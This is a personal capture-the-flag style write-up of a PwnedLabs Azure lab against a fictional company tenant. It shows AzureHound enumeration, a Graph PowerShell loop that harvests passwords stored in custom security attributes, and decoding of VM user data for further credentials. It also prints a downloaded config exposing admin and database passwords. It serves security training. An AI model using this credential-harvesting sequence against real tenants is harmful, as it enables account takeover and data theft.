3. Azure with Bloodhound and Microsoft.Graph
This write-up is based on PwnedLabs.io’s free module, Azure Blob Container to Initial Access, which offers top-notch content at an unbeatable price. While I’m not affiliated with PwnedLabs.io, I highly recommend their resources. Learn more about their subscription options at PwnedLabs.io/pricing.
Great read by JohnLaTwc from the website
Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win.
1. Prep
Start the dataserver!
sudo neo4j console
sudo apt-get install bloodhound
Download azurehound
https://github.com/bloodhoundad/azurehound/releases
2. Run azurehound
Usernames were given. TenantID was retrieved once we login with the given credentials.
az login -u Jose.*****@megabigtech.com -p *****!
[
{
"cloudName": "AzureCloud",
"homeTenantId": "2590ccef-687d-493b-ae8d-441cbab63a72",
"id": "ceff06cb-e29d-4486-a3ae-eaaec5689f94",
"isDefault": true,
"managedByTenants": [],
"name": "Microsoft Azure Sponsorship",
"state": "Enabled",
"tenantDefaultDomain": "megabigtech.com",
"tenantDisplayName": "Default Directory",
"tenantId": "2590ccef-687d-493b-ae8d-441cbab63a72",
"user": {
"name": "Jose.Rodriguez@megabigtech.com",
"type": "user"
}
}
]
└─$ ./azurehound -u "Jose.*****@megabigtech.com" -p '*****!' list --tenant "2590ccef-687d-493b-ae8d-441cbab63a72" -o output.json
2.1 Troubleshoot bloodhound - Forgot password
Password reset if you have forgotten them.
https://neo4j.com/docs/operations-manual/current/authentication-authorization/password-and-user-recovery/#post-recovery
3. Bloodhound Gui.
Login and upload the output.json file to BloodHound GUI.
Can see Azure information.
Total of five Admin Roles are objeserved. Four are identified on Microsoft website or
../Azure General/Built-in Permissions.
However, I was not able to get information on Update Manager. Possibly it is not a built-in roles.
By clicking the link, we can know more about the role.
3.1 BloodHound Custom Query
Good custom query list is here and made it to a table format. ../Azure General/Tool - BloodHound AzureHoundCustomQuery
Azure Global Administrator role
MATCH p =(n)-[r:AZGlobalAdmin*1..]->(m) RETURN p
4. Get Credentials with Microsoft.Graph
# Install MgGrah
Install-Module Microsoft.Graph
# Connect to Microsoft Graph
Connect-MgGraph
# Retrieve all users
$allUsers = Get-MgUser -All
# Loop through all users and retrieve their custom security attributes
foreach ($user in $allUsers) {
$userAttributes = Get-MgUser -UserId $user.Id -Property "customSecurityAttributes"
# Display the additional properties of custom security attributes for each user
Write-Host "User: $($user.UserPrincipalName)"
$userAttributes.CustomSecurityAttributes.AdditionalProperties | Format-List
Write-Host "---------------------------------------------"
}
This will return
...snip...
User: archive@megabigtech.com
Key : Helpdesk
Value : {[@odata.type, #microsoft.graph.customSecurityAttributeValue], [Password, *****!!]}
...snip...
Or one-liner
(Get-MgUser -UserId "archive@megabigtech.com" -Property "customSecurityAttributes").CustomSecurityAttributes.AdditionalProperties | Format-List
Key : Helpdesk
Value : {[@odata.type, #microsoft.graph.customSecurityAttributeValue], [Password, D4taS3cur1ty!!]}
4.1 Getting credentials with Select-Object
I attempted to get the same result using Select-Object query, but the result was not the same, unsure what was the difference.
(Get-MgUser -UserId "archive@megabigtech.com" | Select-Object -Property *).AdditionalProperties
It turns out select-object -property * doesn't return Additional Properties because it only captures top-level properties. And AdditionalProperties is nested within CustomSecurityAttribute.
(Get-MgUser -UserId "archive@megabigtech.com" -Property "customSecurityAttributes" | Select-Object -ExpandProperty CustomSecurityAttributes).AdditionalProperties
5. Let's use GUI!
5.1 Get user information.
From the azure mainpage, go to Users Service, then select archive user.
5.2 Get group information
From the Main page, search for Entra ID Service, then select Manage, follow by Group.
From the Azure Role Assignments tab, we confirmed that IT-HELPDESK group has a Reader Role for Resource Security-PC. I was not able to get this information from azurebloodhound.
# Credentials: User: security-user | Password: Imp0sec0sT!
az storage blob download --account-name securityconfigs --container-name security-pc --name config-latest.xml --auth-mode login
5.2.1 Get Role using az powershell.
Use Az Powershell
PS> Get-AzRoleAssignment
RoleAssignmentName : 4b5ae432-6902-4ca2-bbed-815492eef631 RoleAssignmentId : /subscriptions/ceff06cb-e29d-4486-a3ae-eaaec5689f94/resourcegroups/content-static-2/providers/Microsoft.Compute/virtualMachines/SECURIT
PC/providers/Microsoft.Authorization/roleAssignments/4b5ae432-6902-4ca2-bbed-815492eef631
Scope : /subscriptions/ceff06cb-e29d-4486-a3ae-eaaec5689f94/resourcegroups/content-static-2/providers/Microsoft.Compute/virtualMachines/SECURITY-PC
DisplayName : IT-HELPDESK
SignInName :
RoleDefinitionName : Reader
RoleDefinitionId : acdd72a7-3385-48ef-bd42-f606fba81ae7
ObjectId : 8a517e87-6b05-45ae-b1ca-7436f1682602
ObjectType : Group
CanDelegate : False
Description :
ConditionVersion :
Condition :
5.3 Get Resource information for Virtual Machine
../Azure Services/Azure Virtual Machine
I attempted to get the same info using az or Get-AzVM with the following query, but had no luck with the below query.
(Get-AzVM -ResourceGroupName "CONTENT-STATIC-2" -Name "SECURITY-PC").OSProfile.CustomData
az vm user-data show --name <VMName> --resource-group <ResourceGroupName>
What I needed was this.
Get-AzVM -ResourceGroupName "content-static-2" -Name "SECURITY-PC" -UserData
ResourceGroupName : content-static-2
Id :
/subscriptions/ceff06cb-e29d-4486-a3ae-eaaec5689f94/resourceGroups/content-static-2/providers/Microsoft.Compute/virtualMachines/SECURITY-PC
VmId : 648c8a08-c90a-4a95-8922-4cbf28375bcb
Name : SECURITY-PC
Type : Microsoft.Compute/virtualMachines
Location : eastus
LicenseType : Windows_Client
Tags : {}
HardwareProfile : {VmSize}
NetworkProfile : {NetworkInterfaces}
SecurityProfile : {UefiSettings, SecurityType}
OSProfile : {ComputerName, AdminUsername, WindowsConfiguration, Secrets, AllowExtensionOperations, RequireGuestProvisionSignal}
ProvisioningState : Succeeded
StorageProfile : {ImageReference, OsDisk, DataDisks, DiskControllerType}
Identity : {PrincipalId, TenantId, Type}
Zones : {1}
UserData : IyBDcmVkZW50aWFsczogVXNlcjogc2VjdXJpdHktdXNlciB8IFBhc3N3b3JkOiBJbXAwc2VjMHNUIQpheiBzdG9yYWdlIGJsb2IgZG93bmxvYWQgLS1hY2NvdW50LW5hbWUgc2Vj
dXJpdHljb25maWdzIC0tY29udGFpbmVyLW5hbWUgc2VjdXJpdHktcGMgLS1uYW1lIGNvbmZpZy1sYXRlc3QueG1sIC0tYXV0aC1tb2RlIGxvZ2luCg==
TimeCreated : 10/31/2023 3:24:18PM
Etag : "16"
Then decode with the following
[System.Text.Encoding]::UTF8.GetStringFromBase64String("IyBDcmVkZW50aWFsczogVXNlcjogc2VjdXJpdHktdXNlciB8IFBhc3N3b3JkOiBJbXAwc2VjMHNUIQpheiBzdG9yYWdlIGJsb2IgZG93bmxvYWQgLS1hY2NvdW50LW5hbWUgc2VjdXJpdHljb25maWdzIC0tY29udGFpbmVyLW5hbWUgc2VjdXJpdHktcGMgLS1uYW1lIGNvbmZpZy1sYXRlc3QueG1sIC0tYXV0aC1tb2RlIGxvZ2luCg==")
6. Check blob!
../Azure Services/Azure Storage Account
# Credentials: User: security-user | Password: *****!
az logout
az login -u security-user@megabigtech.com -p *****!
az storage blob download --account-name securityconfigs --container-name security-pc --name config-latest.xml --auth-mode login
<?xml version="1.0" encoding="UTF-8"?>
<SecurityConfiguration>
<!-- Resource Group Settings -->
<ResourceGroup>
<Name>MegaTechResourceGroup</Name>
<Location>East US</Location>
<Description>Primary resource group for Mega Big Tech security application.</Description>
</ResourceGroup>
<!-- Tenant and Subscription Information -->
<Tenant>
<ID>12345678-1234-1234-1234-123456789012</ID>
<Name>MegaBigTechTenant</Name>
<Subscription>
<ID>abcd1234-abcd-1234-abcd-1234abcd1234</ID>
<Name>MegaTechSecuritySubscription</Name>
<Type>Premium</Type>
<StartDate>2023-01-01</StartDate>
<EndDate>2024-01-01</EndDate>
</Subscription>
</Tenant>
<!-- Alerting Settings -->
<Alerting>
<Email>securityalerts@megabigtech.com</Email>
<SMTPServer>
<Address>smtp.megabigtech.com</Address>
<Port>587</Port>
</SMTPServer>
<Thresholds>
<CPUUsage>90</CPUUsage> <!-- Percentage -->
<MemoryUsage>90</MemoryUsage> <!-- Percentage -->
<DiskSpace>10</DiskSpace> <!-- Remaining GB -->
</Thresholds>
</Alerting>
<!-- Global Admin Account Credentials -->
<GlobalAdmin>
<Username>ryan@megabigtech.com</Username>
<Password>AzureAdmin12345!</Password>
<Email>ryan@megabigtech.com</Email>
<TwoFactorAuthentication>Enabled</TwoFactorAuthentication>
</GlobalAdmin>
<!-- Logging Settings -->
<Logging>
<Level>Verbose</Level> <!-- Can be Verbose, Info, Warning, Error, Critical -->
<RetentionPeriod>90</RetentionPeriod> <!-- Days -->
<LogPath>/var/logs/security_app/</LogPath>
</Logging>
<!-- Database Configuration -->
<Database>
<Type>SQL</Type>
<ConnectionString>Server=megabigtech.database.windows.net;Database=SecurityDB;User Id=dbuser;Password=dbp@ssword;</ConnectionString>
<Backup>
<Schedule>Daily</Schedule>
<BackupPath>/backups/security_app/</BackupPath>
<RetentionPeriod>30</RetentionPeriod> <!-- Days -->
</Backup>
</Database>
<!-- Firewall Settings -->
<Firewall>
<Status>Enabled</Status>
<AllowedIPs>
<IP>14.24.156.58</IP>
<IP>35.125.4.26</IP>
</AllowedIPs>
</Firewall>
</SecurityConfiguration>
For fun... Let's get more info about archive
PS> az login -u ar*****@megabigtech.com --password ***** --allow-no-subscriptions
2590ccef-687d-493b-ae8d-441cbab63a72 'Default Directory'
[
{
"cloudName": "AzureCloud",
"id": "2590ccef-687d-493b-ae8d-441cbab63a72",
"isDefault": true,
"name": "N/A(tenant level account)",
"state": "Enabled",
"tenantId": "2590ccef-687d-493b-ae8d-441cbab63a72",
"user": {
"name": "arc*****@megabigtech.com",
"type": "user"
}
}
]
